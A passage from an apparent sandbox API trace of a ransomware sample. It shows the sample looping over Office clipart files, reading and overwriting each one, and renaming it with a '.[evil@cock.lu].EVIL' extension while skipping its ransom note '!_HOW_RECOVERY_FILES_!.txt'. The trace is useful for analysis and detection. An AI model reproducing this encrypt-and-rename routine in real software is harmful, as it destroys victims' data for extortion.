(lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF", dwFileAttributes=0x200) returned 0 [0152.728] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.728] wcsstr (_Str="J0239057.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.728] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF") returned 69 [0152.728] wcscmp (_String1="J0239057.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.728] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239057.WMF") returned 0x0 [0152.728] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF") returned 0x45 [0152.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.730] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1284, lpOverlapped=0x0) returned 1 [0152.740] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.740] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.740] _errno () returned 0x84b1160840 [0152.740] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.740] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12a0, lpOverlapped=0x0) returned 1 [0152.740] CloseHandle (hObject=0x1a8) returned 1 [0152.740] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.740] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.741] __uncaught_exception () returned 0x84b1160800 [0152.741] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.741] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf.[evil@cock.lu].evil")) returned 1 [0152.741] ??_V@YAXPEAX@Z () returned 0x1 [0152.744] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF", dwFileAttributes=0x200) returned 0 [0152.744] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.744] wcsstr (_Str="J0239063.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.744] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF") returned 69 [0152.744] wcscmp (_String1="J0239063.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.744] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239063.WMF") returned 0x0 [0152.744] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF") returned 0x45 [0152.744] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.746] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16fc, lpOverlapped=0x0) returned 1 [0152.760] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.760] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.760] _errno () returned 0x84b1160840 [0152.760] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.760] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1700, lpOverlapped=0x0) returned 1 [0152.761] CloseHandle (hObject=0x1a8) returned 1 [0152.761] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.761] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.761] __uncaught_exception () returned 0x84b1160800 [0152.761] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.761] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf.[evil@cock.lu].evil")) returned 1 [0152.762] ??_V@YAXPEAX@Z () returned 0x1 [0152.765] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF", dwFileAttributes=0x200) returned 0 [0152.765] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.765] wcsstr (_Str="J0239079.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.765] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF") returned 69 [0152.765] wcscmp (_String1="J0239079.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.765] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239079.WMF") returned 0x0 [0152.765] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF") returned 0x45 [0152.765] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.767] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1294, lpOverlapped=0x0) returned 1 [0152.774] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.774] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.774] _errno () returned 0x84b1160840 [0152.774] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.774] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12a0, lpOverlapped=0x0) returned 1 [0152.774] CloseHandle (hObject=0x1a8) returned 1 [0152.774] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.775] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.775] __uncaught_exception () returned 0x84b1160800 [0152.775] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.775] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf.[evil@cock.lu].evil")) returned 1 [0152.777] ??_V@YAXPEAX@Z () returned 0x1 [0152.780] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF", dwFileAttributes=0x200) returned 0 [0152.780] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.780] wcsstr (_Str="J0239191.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.780] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF") returned 69 [0152.780] wcscmp (_String1="J0239191.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.780] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239191.WMF") returned 0x0 [0152.780] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF") returned 0x45 [0152.780] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.782] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1464, lpOverlapped=0x0) returned 1 [0152.791] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.791] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.791] _errno () returned 0x84b1160840 [0152.791] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.791] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1480, lpOverlapped=0x0) returned 1 [0152.791] CloseHandle (hObject=0x1a8) returned 1 [0152.791] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.791] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.791] __uncaught_exception () returned 0x84b1160800 [0152.791] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.792] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf.[evil@cock.lu].evil")) returned 1 [0152.793] ??_V@YAXPEAX@Z () returned 0x1 [0152.796] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF", dwFileAttributes=0x200) returned 0 [0152.796] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.796] wcsstr (_Str="J0239611.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.796] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF") returned 69 [0152.796] wcscmp (_String1="J0239611.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.796] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239611.WMF") returned 0x0 [0152.796] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF") returned 0x45 [0152.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.798] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8424, lpOverlapped=0x0) returned 1 [0152.807] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.807] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.807] _errno () returned 0x84b1160840 [0152.807] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.807] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x8440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8440, lpOverlapped=0x0) returned 1 [0152.807] CloseHandle (hObject=0x1a8) returned 1 [0152.807] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.808] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.808] __uncaught_exception () returned 0x84b1160800 [0152.808] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.808] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf.[evil@cock.lu].evil")) returned 1 [0152.809] ??_V@YAXPEAX@Z () returned 0x1 [0152.812] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF", dwFileAttributes=0x200) returned 0 [0152.812] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.812] wcsstr (_Str="J0239935.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.812] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF") returned 69 [0152.812] wcscmp (_String1="J0239935.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.812] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239935.WMF") returned 0x0 [0152.812] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF") returned 0x45 [0152.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.815] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1314, lpOverlapped=0x0) returned 1 [0152.823] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.823] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.823] _errno () returned 0x84b1160840 [0152.823] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.823] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1320, lpOverlapped=0x0) returned 1 [0152.823] CloseHandle (hObject=0x1a8) returned 1 [0152.823] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.823] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.824] __uncaught_exception () returned 0x84b1160800 [0152.824] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.824] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf.[evil@cock.lu].evil")) returned 1 [0152.825] ??_V@YAXPEAX@Z () returned 0x1 [0152.828] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF", dwFileAttributes=0x200) returned 0 [0152.828] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.828] wcsstr (_Str="J0239941.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.828] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF") returned 69 [0152.828] wcscmp (_String1="J0239941.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.828] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239941.WMF") returned 0x0 [0152.828] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF") returned 0x45 [0152.828] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.830] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1418, lpOverlapped=0x0) returned 1 [0152.863] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.863] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.863] _errno () returned 0x84b1160840 [0152.863] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.864] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1420, lpOverlapped=0x0) returned 1 [0152.864] CloseHandle (hObject=0x1a8) returned 1 [0152.864] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.864] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.864] __uncaught_exception () returned 0x84b1160800 [0152.864] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.864] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf.[evil@cock.lu].evil")) returned 1 [0152.865] ??_V@YAXPEAX@Z () returned 0x1 [0152.868] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF", dwFileAttributes=0x200) returned 0 [0152.868] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.868] wcsstr (_Str="J0239943.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.868] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF") returned 69 [0152.868] wcscmp (_String1="J0239943.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.868] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239943.WMF") returned 0x0 [0152.868] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF") returned 0x45 [0152.868] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.870] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1998, lpOverlapped=0x0) returned 1 [0152.877] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.877] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.877] _errno () returned 0x84b1160840 [0152.877] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.877] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19a0, lpOverlapped=0x0) returned 1 [0152.877] CloseHandle (hObject=0x1a8) returned 1 [0152.877] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.877] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.877] __uncaught_exception () returned 0x84b1160800 [0152.877] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.878] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf.[evil@cock.lu].evil")) returned 1 [0152.879] ??_V@YAXPEAX@Z () returned 0x1 [0152.881] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF", dwFileAttributes=0x200) returned 0 [0152.882] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.882] wcsstr (_Str="J0239951.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.882] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF") returned 69 [0152.882] wcscmp (_String1="J0239951.WMF", 